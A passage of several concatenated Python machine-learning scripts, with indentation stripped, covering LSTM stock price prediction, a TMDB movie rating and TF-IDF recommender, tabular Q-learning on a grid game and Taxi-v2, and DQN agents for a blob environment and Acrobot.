# extract data
self.df = result['df']
self.X_train = result['X_train']
self.X_test = result['X_test']
self.y_train = result['y_train']
self.y_test = result['y_test']
self.column_scaler = result['column_scaler']
self.last_sequence = result['last_sequence']
if self.shuffle:
self.unshuffled_X_test = result['unshuffled_X_test']
self.unshuffled_y_test = result['unshuffled_y_test']
else:
self.unshuffled_X_test = self.X_test
self.unshuffled_y_test = self.y_test
self.original_X_test = self.unshuffled_X_test.reshape((self.unshuffled_X_test.shape[0], self.unshuffled_X_test.shape[2], -1))
self.data_loaded = True
if self.verbose > 0:
print("[+] Data loaded")
# save the dataframe to disk
self.save_data()
def get_last_price(self):
"""Returns the last price ( i.e the most recent price )"""
if not self.last_price:
self.last_price = float(self.df[self.price_column].tail(1))
return self.last_price
def get_test_prices(self):
"""Returns test prices. Note that this function won't return the whole sequences,
instead, it'll return only the last value of each sequence"""
if self.test_prices is None:
current = np.squeeze(self.column_scaler[self.price_column].inverse_transform([[ v[-1][0] for v in self.original_X_test ]]))
future = np.squeeze(self.column_scaler[self.price_column].inverse_transform(np.expand_dims(self.unshuffled_y_test, axis=0)))
self.test_prices = np.array(list(current) + [future[-1]])
return self.test_prices
def get_y_pred(self):
"""Get predicted values of the testing set of sequences ( y_pred )"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
if self.y_pred is None:
self.y_pred = np.squeeze(self.column_scaler[self.price_column].inverse_transform(self.model.predict(self.unshuffled_X_test)))
return self.y_pred
def get_y_true(self):
"""Returns original y testing values ( y_true )"""
test_prices = self.get_test_prices()
return test_prices[1:]
def _get_shifted_y_true(self):
"""Returns original y testing values shifted by -1.
This function is useful for converting to a classification problem"""
test_prices = self.get_test_prices()
return test_prices[:-1]
def _calc_classified_prices(self):
"""Convert regression predictions to a classification predictions ( buy or sell )
and set results to self.classified_y_pred for predictions and self.classified_y_true
for true prices"""
if self.classified_y_true is None or self.classified_y_pred is None:
current_prices = self._get_shifted_y_true()
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
self.classified_y_true = list(map(classify, current_prices, future_prices))
self.classified_y_pred = list(map(classify, current_prices, predicted_prices))
# some metrics
def get_MAE(self):
"""Calculates the Mean-Absolute-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_absolute_error(y_true, y_pred)
def get_MSE(self):
"""Calculates the Mean-Squared-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_squared_error(y_true, y_pred)
def get_accuracy(self):
"""Calculates the accuracy after adding classification approach (buy/sell)"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
self._calc_classified_prices()
return accuracy_score(self.classified_y_true, self.classified_y_pred)
def plot_test_set(self):
"""Plots test data"""
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
plt.plot(future_prices, c='b')
plt.plot(predicted_prices, c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def save_data(self):
"""Saves the updated dataframe if it does not exist"""
filename, exists = self._df_exists()
if not exists:
self.df.to_csv(filename)
if self.verbose > 0:
print("[+] Dataframe saved")
def _update_model_name(self):
stock = self.ticker_name.replace(" ", "_")
feature_columns_str = ''.join([ c[0] for c in self.feature_columns ])
time_now = time.strftime("%Y-%m-%d")
self.model_name = f"{time_now}_{stock}-{feature_columns_str}-loss-{self.loss}-{self.cell.__name__}-seq-{self.n_steps}-step-{self.lookup_step}-layers-{self.n_layers}-units-{self.units}"
def _get_df_name(self):
"""Returns the updated dataframe name"""
time_now = time.strftime("%Y-%m-%d")
return f"data/{self.ticker_name}_{time_now}.csv"
def _df_exists(self):
"""Check if the updated dataframe exists in disk, returns a tuple contains (filename, file_exists)"""
filename = self._get_df_name()
return filename, os.path.isfile(filename)
def _get_model_filename(self):
"""Returns the relative path of this model name with h5 extension"""
return f"results/{self.model_name}.h5"
def _model_exists(self):
"""Checks if model already exists in disk, returns the filename,
returns None otherwise"""
filename = self._get_model_filename()
return filename if os.path.isfile(filename) else None
# uncomment below to use CPU instead of GPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=4,
# inter_op_parallelism_threads=4,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from tensorflow.keras.layers import GRU, LSTM
from price_prediction import PricePrediction
ticker = "AAPL"
p = PricePrediction(ticker, feature_columns=['adjclose', 'volume', 'open', 'high', 'low'],
epochs=700, cell=LSTM, optimizer="rmsprop", n_layers=3, units=256,
loss="mse", shuffle=True, dropout=0.4)
p.train(True)
print(f"The next predicted price for {ticker} is {p.predict()}")
buy_sell = p.predict(classify=True)
print(f"you should {'sell' if buy_sell == 0 else 'buy'}.")
print("Mean Absolute Error:", p.get_MAE())
print("Mean Squared Error:", p.get_MSE())
print(f"Accuracy: {p.get_accuracy()*100:.3f}%")
p.plot_test_set()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from yahoo_fin import stock_info as si
from collections import deque
import pandas as pd
import numpy as np
import random
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3, loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
model.add(Dropout(dropout))
elif i == n_layers -1:
# last layer
model.add(cell(units, return_sequences=False))
model.add(Dropout(dropout))
else:
# middle layers
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
def load_data(ticker, n_steps=60, scale=True, split=True, balance=False, shuffle=True,
lookup_step=1, test_size=0.15, price_column='Price', feature_columns=['Price'],
target_column="future", buy_sell=False):
"""Loads data from yahoo finance, if the ticker is a pd Dataframe,
it'll use it instead"""
if isinstance(ticker, str):
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
df = ticker
else:
raise TypeError("ticker can be either a str, or a pd.DataFrame instance")
result = {}
result['df'] = df.copy()
# make sure that columns passed is in the dataframe
for col in feature_columns:
assert col in df.columns
column_scaler = {}
if scale:
# scale the data ( from 0 to 1 )
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# df[column] = preprocessing.scale(df[column].values)
# add column scaler to the result
result['column_scaler'] = column_scaler
# add future price column ( shift by -1 )
df[target_column] = df[price_column].shift(-lookup_step)
# get last feature elements ( to add them to the last sequence )
# before deleted by df.dropna
last_feature_element = np.array(df[feature_columns].tail(1))
# clean NaN entries
df.dropna(inplace=True)
if buy_sell:
# convert target column to 0 (for sell -down- ) and to 1 ( for buy -up-)
df[target_column] = list(map(classify, df[price_column], df[target_column]))
seq_data = [] # all sequences here
# sequences are made with deque, which keeps the maximum length by popping out older values as new ones come in
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df[target_column].values):
sequences.append(entry)
if len(sequences) == n_steps:
seq_data.append([np.array(sequences), target])
# get the last sequence for future predictions
last_sequence = np.array(sequences)
# shift the sequence, one element is missing ( deleted by dropna )
last_sequence = shift(last_sequence, -1)
# fill the last element
last_sequence[-1] = last_feature_element
# add last sequence to results
result['last_sequence'] = last_sequence
if buy_sell and balance:
buys, sells = [], []
for seq, target in seq_data:
if target == 0:
sells.append([seq, target])
else:
buys.append([seq, target])
# balancing the dataset
lower_length = min(len(buys), len(sells))
buys = buys[:lower_length]
sells = sells[:lower_length]
seq_data = buys + sells
if shuffle:
unshuffled_seq_data = seq_data.copy()
# shuffle data
random.shuffle(seq_data)
X, y = [], []
for seq, target in seq_data:
X.append(seq)
y.append(target)
X = np.array(X)
y = np.array(y)
if shuffle:
unshuffled_X, unshuffled_y = [], []
for seq, target in unshuffled_seq_data:
unshuffled_X.append(seq)
unshuffled_y.append(target)
unshuffled_X = np.array(unshuffled_X)
unshuffled_y = np.array(unshuffled_y)
unshuffled_X = unshuffled_X.reshape((unshuffled_X.shape[0], unshuffled_X.shape[2], unshuffled_X.shape[1]))
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
if not split:
# return original_df, X, y, column_scaler, last_sequence
result['X'] = X
result['y'] = y
return result
else:
# split dataset into training and testing
n_samples = X.shape[0]
train_samples = int(n_samples * (1 - test_size))
result['X_train'] = X[:train_samples]
result['X_test'] = X[train_samples:]
result['y_train'] = y[:train_samples]
result['y_test'] = y[train_samples:]
if shuffle:
result['unshuffled_X_test'] = unshuffled_X[train_samples:]
result['unshuffled_y_test'] = unshuffled_y[train_samples:]
return result
# from sentdex
def classify(current, future):
if float(future) > float(current): # if the future price is higher than the current, that's a buy, or a 1
return 1
else: # otherwise... it's a 0!
return 0
def shift(arr, num, fill_value=np.nan):
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result = arr
return result
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_extraction.text import TfidfVectorizer
movies_path = r"E:\datasets\recommender_systems\tmdb_5000_movies.csv"
credits_path = r"E:\datasets\recommender_systems\tmdb_5000_credits.csv"
credits = pd.read_csv(credits_path)
movies = pd.read_csv(movies_path)
# rename movie_id to id to merge dataframes later
credits = credits.rename(index=str, columns={'movie_id': 'id'})
# join on movie id column
movies = movies.merge(credits, on="id")
# drop useless columns
movies = movies.drop(columns=['homepage', 'title_x', 'title_y', 'status', 'production_countries'])
# number of votes of the movie
V = movies['vote_count']
# rating average of the movie from 0 to 10
R = movies['vote_average']
# the mean vote across the whole report
C = movies['vote_average'].mean()
# minimum votes required to be listed in the top 250
m = movies['vote_count'].quantile(0.7)
movies['weighted_average'] = (V/(V+m) * R) + (m/(m+V) * C)
# ranked movies
wavg = movies.sort_values('weighted_average', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=wavg['weighted_average'].head(10), y=wavg['original_title'].head(10), data=wavg, palette='deep')
plt.xlim(6.75, 8.35)
plt.title('"Best" Movies by TMDB Votes', weight='bold')
plt.xlabel('Weighted Average Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('best_movies.png')
popular = movies.sort_values('popularity', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=popular['popularity'].head(10), y=popular['original_title'].head(10), data=popular, palette='deep')
plt.title('"Most Popular" Movies by TMDB Votes', weight='bold')
plt.xlabel('Popularity Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('popular_movies.png')
############ Content-Based ############
# filling NaNs with empty string
movies['overview'] = movies['overview'].fillna('')
tfv = TfidfVectorizer(min_df=3, max_features=None,
strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
stop_words = 'english')
tfv_matrix = tfv.fit_transform(movies['overview'])
print(tfv_matrix.shape)
print(tfv_matrix)
import numpy as np
from PIL import Image
import cv2 # showing the env
import matplotlib.pyplot as plt
import pickle
from matplotlib import style
import time
import os
from collections.abc import Iterable
style.use("ggplot")
GRID_SIZE = 10
# how many episodes
EPISODES = 1_000
# how many steps in the env
STEPS = 200
# Rewards for differents events
MOVE_REWARD = -1
ENEMY_REWARD = -300
FOOD_REWARD = 30
epsilon = 0 # for randomness, it'll decay over time by EPSILON_DECAY
EPSILON_DECAY = 0.999993 # every episode, epsilon *= EPSILON_DECAY
SHOW_EVERY = 1
q_table = f"qtable-grid-{GRID_SIZE}-steps-{STEPS}.npy" # put here pretrained model ( if exists )
LEARNING_RATE = 0.1
DISCOUNT = 0.95
PLAYER_CODE = 1
FOOD_CODE = 2
ENEMY_CODE = 3
# blob dict, for colors
COLORS = {
PLAYER_CODE: (255, 120, 0), # blueish color
FOOD_CODE: (0, 255, 0), # green
ENEMY_CODE: (0, 0, 255), # red
}
ACTIONS = {
0: (0, 1),
1: (-1, 0),
2: (0, -1),
3: (1, 0)
}
N_ENEMIES = 2
def get_observation(cords):
obs = []
for item1 in cords:
for item2 in item1:
obs.append(item2+GRID_SIZE-1)
return tuple(obs)
class Blob:
def __init__(self, name=None):
self.x = np.random.randint(0, GRID_SIZE)
self.y = np.random.randint(0, GRID_SIZE)
self.name = name if name else "Blob"
def __sub__(self, other):
return (self.x - other.x, self.y - other.y)
def __str__(self):
return f"<{self.name.capitalize()} x={self.x}, y={self.y}>"
def move(self, x=None, y=None):
# if x is None, move randomly
if x is None:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# if y is None, move randomly
if y is None:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# out of bound fix
if self.x < 0:
# self.x = GRID_SIZE-1
self.x = 0
elif self.x > GRID_SIZE-1:
# self.x = 0
self.x = GRID_SIZE-1
if self.y < 0:
# self.y = GRID_SIZE-1
self.y = 0
elif self.y > GRID_SIZE-1:
# self.y = 0
self.y = GRID_SIZE-1
def take_action(self, choice):
# if choice == 0:
# self.move(x=1, y=1)
# elif choice == 1:
# self.move(x=-1, y=-1)
# elif choice == 2:
# self.move(x=-1, y=1)
# elif choice == 3:
# self.move(x=1, y=-1)
for code, (move_x, move_y) in ACTIONS.items():
if choice == code:
self.move(x=move_x, y=move_y)
# if choice == 0:
# self.move(x=1, y=0)
# elif choice == 1:
# self.move(x=0, y=1)
# elif choice == 2:
# self.move(x=-1, y=0)
# elif choice == 3:
# self.move(x=0, y=-1)
# construct the q_table if not already trained
if q_table is None or not os.path.isfile(q_table):
# q_table = {}
# # for every possible combination of the distance of the player
# # to both the food and the enemy
# for i in range(-GRID_SIZE+1, GRID_SIZE):
# for ii in range(-GRID_SIZE+1, GRID_SIZE):
# for iii in range(-GRID_SIZE+1, GRID_SIZE):
# for iiii in range(-GRID_SIZE+1, GRID_SIZE):
# q_table[(i, ii), (iii, iiii)] = np.random.uniform(-5, 0, size=len(ACTIONS))
q_table = np.random.uniform(-5, 0, size=[GRID_SIZE*2-1]*(2+2*N_ENEMIES) + [len(ACTIONS)])
else:
# the q table already exists
print("Loading Q-table")
q_table = np.load(q_table)
# this list for tracking rewards
episode_rewards = []
# game loop
for episode in range(EPISODES):
# initialize our blobs ( squares )
player = Blob("Player")
food = Blob("Food")
enemy1 = Blob("Enemy1")
enemy2 = Blob("Enemy2")
if episode % SHOW_EVERY == 0:
print(f"[{episode:05}] ep: {epsilon:.4f} reward mean: {np.mean(episode_rewards[-SHOW_EVERY:])} alpha={LEARNING_RATE}")
show = True
else:
show = False
episode_reward = 0
for i in range(STEPS):
# get the observation
obs = get_observation((player - food, player - enemy1, player - enemy2))
# Epsilon-greedy policy
if np.random.random() > epsilon:
# get the action from the q table
action = np.argmax(q_table[obs])
else:
# random action
action = np.random.randint(0, len(ACTIONS))
# take the action
player.take_action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
food.move()
enemy1.move()
enemy2.move()
### for rewarding
if player.x == enemy1.x and player.y == enemy1.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == enemy2.x and player.y == enemy2.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == food.x and player.y == food.y:
# if it hit the food, reward
reward = FOOD_REWARD
else:
# else, punish it a little for moving
reward = MOVE_REWARD
### calculate the Q
# get the future observation after taking action
future_obs = get_observation((player - food, player - enemy1, player - enemy2))
# get the max future Q value (SarsaMax algorithm)
# SARSA = State0, Action0, Reward0, State1, Action1
max_future_q = np.max(q_table[future_obs])
# get the current Q
current_q = q_table[obs][action]
# calculate the new Q
if reward == FOOD_REWARD:
new_q = FOOD_REWARD
else:
# value iteration update
# https://en.wikipedia.org/wiki/Q-learning
# Calculate the Temporal-Difference target
td_target = reward + DISCOUNT * max_future_q
# Temporal-Difference
new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * td_target
# update the q
q_table[obs][action] = new_q
if show:
env = np.zeros((GRID_SIZE, GRID_SIZE, 3), dtype=np.uint8)
# set food blob to green
env[food.x][food.y] = COLORS[FOOD_CODE]
# set the enemy blob to red
env[enemy1.x][enemy1.y] = COLORS[ENEMY_CODE]
env[enemy2.x][enemy2.y] = COLORS[ENEMY_CODE]
# set the player blob to blueish
env[player.x][player.y] = COLORS[PLAYER_CODE]
# get the image
image = Image.fromarray(env, 'RGB')
image = image.resize((600, 600))
# show the image
cv2.imshow("image", np.array(image))
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
if cv2.waitKey(500) == ord('q'):
break
else:
if cv2.waitKey(100) == ord('q'):
break
episode_reward += reward
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
break
episode_rewards.append(episode_reward)
# decay a little randomness in each episode
epsilon *= EPSILON_DECAY
# with open(f"qtable-{int(time.time())}.pickle", "wb") as f:
# pickle.dump(q_table, f)
np.save(f"qtable-grid-{GRID_SIZE}-steps-{STEPS}", q_table)
moving_avg = np.convolve(episode_rewards, np.ones((SHOW_EVERY,))/SHOW_EVERY, mode='valid')
plt.plot([i for i in range(len(moving_avg))], moving_avg)
plt.ylabel(f"Avg Reward every {SHOW_EVERY}")
plt.xlabel("Episode")
plt.show()
import numpy as np
import gym
import random
import matplotlib.pyplot as plt
import os
import time
env = gym.make("Taxi-v2").env
# init the Q-Table
# (500x6) matrix (n_states x n_actions)
q_table = np.zeros((env.observation_space.n, env.action_space.n))
# Hyper Parameters
# alpha
LEARNING_RATE = 0.1
# gamma
DISCOUNT_RATE = 0.9
EPSILON = 0.9
EPSILON_DECAY = 0.99993
EPISODES = 100_000
SHOW_EVERY = 1_000
# for plotting metrics
all_epochs = []
all_penalties = []
all_rewards = []
for i in range(EPISODES):
# reset the env
state = env.reset()
epochs, penalties, rewards = 0, 0, []
done = False
while not done:
if random.random() < EPSILON:
# exploration
action = env.action_space.sample()
else:
# exploitation
action = np.argmax(q_table[state])
next_state, reward, done, info = env.step(action)
old_q = q_table[state, action]
future_q = np.max(q_table[next_state])
# calculate the new Q ( Q-Learning equation, i.e SARSAMAX )
new_q = (1 - LEARNING_RATE) * old_q + LEARNING_RATE * ( reward + DISCOUNT_RATE * future_q)
# update the new Q
q_table[state, action] = new_q
if reward == -10:
penalties += 1
state = next_state
epochs += 1
rewards.append(reward)
if i % SHOW_EVERY == 0:
print(f"[{i}] avg reward:{np.average(all_rewards):.4f} eps:{EPSILON:.4f}")
# env.render()
all_epochs.append(epochs)
all_penalties.append(penalties)
all_rewards.append(np.average(rewards))
EPSILON *= EPSILON_DECAY
# env.render()
# plt.plot(list(range(len(all_rewards))), all_rewards)
# plt.show()
print("Playing in 5 seconds...")
time.sleep(5)
os.system("cls") if "nt" in os.name else os.system("clear")
# render
state = env.reset()
done = False
while not done:
action = np.argmax(q_table[state])
state, reward, done, info = env.step(action)
env.render()
time.sleep(0.2)
os.system("cls") if "nt" in os.name else os.system("clear")
env.render()
import cv2
from PIL import Image
import os
# to use CPU uncomment below code
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Activation, Flatten
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 20_000
MIN_REPLAY_MEMORY = 1_000
SHOW_EVERY = 50
RENDER_EVERY = 100
LEARN_EVERY = 50
GRID_SIZE = 20
ACTION_SIZE = 9
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=1)
elif choice == 1:
self.move(x=-1, y=-1)
elif choice == 2:
self.move(x=-1, y=1)
elif choice == 3:
self.move(x=1, y=-1)
elif choice == 4:
self.move(x=1, y=0)
elif choice == 5:
self.move(x=-1, y=0)
elif choice == 6:
self.move(x=0, y=1)
elif choice == 7:
self.move(x=0, y=-1)
elif choice == 8:
self.move(x=0, y=0)
def move(self, x=False, y=False):
# If no value for x, move randomly
if not x:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if not y:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
RETURN_IMAGES = True
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
ACTION_SPACE_SIZE = 9
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, size):
self.SIZE = size
self.OBSERVATION_SPACE_VALUES = (self.SIZE, self.SIZE, 3) # 4
def reset(self):
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
self.enemy = Blob(self.SIZE)
while self.enemy == self.player or self.enemy == self.food:
self.enemy = Blob(self.SIZE)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
observation = (self.player-self.food) + (self.player-self.enemy)
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = (self.player-self.food) + (self.player-self.enemy)
if self.player == self.enemy:
reward = -self.ENEMY_PENALTY
done = True
elif self.player == self.food:
reward = self.FOOD_REWARD
done = True
else:
reward = -self.MOVE_PENALTY
if self.episode_step < 200:
done = False
else:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
env[self.enemy.x][self.enemy.y] = self.d[self.ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=self.state_size))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
# for images, expand dimension, comment if you are not using images as states
state = state / 255
next_state = next_state / 255
state = np.expand_dims(state, axis=0)
next_state = np.expand_dims(next_state, axis=0)
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
state = state / 255
state = np.expand_dims(state, axis=0)
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
if len(self.memory) < MIN_REPLAY_MEMORY:
return
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0, batch_size=1)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
batch_size = 64
env = BlobEnv(GRID_SIZE)
agent = DQNAgent(env.OBSERVATION_SPACE_VALUES, ACTION_SIZE)
ep_rewards = deque([-200], maxlen=SHOW_EVERY)
avg_rewards = []
min_rewards = []
max_rewards = []
for episode in range(1, EPISODES+1):
# restarting episode => reset episode reward and step number
episode_reward = 0
step = 1
# reset env and get init state
current_state = env.reset()
done = False
while True:
# take action
action = agent.act(current_state)
next_state, reward, done = env.step(action)
episode_reward += reward
if episode % RENDER_EVERY == 0:
env.render()
# add transition to agent's memory
agent.remember(current_state, action, reward, next_state, done)
if step % LEARN_EVERY == 0:
agent.replay(batch_size=batch_size)
current_state = next_state
step += 1
if done:
agent.update_target_model()
break
ep_rewards.append(episode_reward)
avg_reward = np.mean(ep_rewards)
min_reward = min(ep_rewards)
max_reward = max(ep_rewards)
avg_rewards.append(avg_reward)
min_rewards.append(min_reward)
max_rewards.append(max_reward)
print(f"[{episode}] avg:{avg_reward:.2f} min:{min_reward} max:{max_reward} eps:{agent.epsilon:.4f}")
# if episode % SHOW_EVERY == 0:
# print(f"[{episode}] avg: {avg_reward} min: {min_reward} max: {max_reward} eps: {agent.epsilon:.4f}")
episodes = list(range(EPISODES))
plt.plot(episodes, avg_rewards, c='b')
plt.plot(episodes, min_rewards, c='r')
plt.plot(episodes, max_rewards, c='g')
plt.show()
agent.save("blob_v1.h5")
import os
# to use CPU uncomment below code
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 2_000
SHOW_EVERY = 500
RENDER_EVERY = 1_000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(32, input_dim=self.state_size, activation="relu"))
model.add(Dense(32, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
env = gym.make("Acrobot-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
# agent.load("AcroBot_v1.h5")
done = False
batch_size = 32
all_rewards = deque(maxlen=SHOW_EVERY)
avg_rewards = []
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
rewards = 0
while True:
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
